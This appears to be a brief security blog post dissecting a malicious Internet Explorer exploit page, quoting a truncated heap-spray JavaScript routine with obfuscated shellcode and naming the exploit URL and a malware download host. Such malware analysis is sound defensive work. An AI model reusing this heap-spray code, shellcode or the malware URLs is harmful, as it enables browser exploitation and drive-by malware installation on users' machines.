vip.4s3w.cn/vip/I7.htm

another IE exploit, but this evasion technique is so cute, take a look:

[snip]
function spray(sc)
{
var infect=unescape(sc.replace(/cuteqqcn/g,"\x25\x75"));
var CuteSize=0x100000;
var cuteLoadSize=infect.length*2;
var szlong=CuteSize-(cuteLoadSize+0x038);
var retVal=unescape("%u0a0a%u0a0a");
retVal=getSampleValue(retVal,szlong);
aaablk=(0x0a0a0a0a-0x100000)/CuteSize;
zzchuck=new window['Array']();
for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
}

function getSampleValue(retVal,szlong)
{
while(retVal.length*2<szlong)
{retVal+=retVal}
retVal=retVal.substring(0,szlong/2);
return retVal
}
var a1="cuteqqcn";
spray("cuteqqcn9090cuteqqcn9090cuteqqcn9090"+a1+"6090cuteqqcn17ebcuteqqcn645ecuteqqcn30a1cuteqqcn0000cuteqqcn0500cuteqqcn0800cuteqqcn0000cuteqqcnf88bcuteqqcn00b9cuteqqcn0004cuteqqcnf300
[snip]

Well…maybe not…, just trying to evade detection by replacing %u with “cuteqqcn”

Anyway, the shellcode will download malware from
www-onlinedown.com/ie7/DUMete.exe (VT result)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: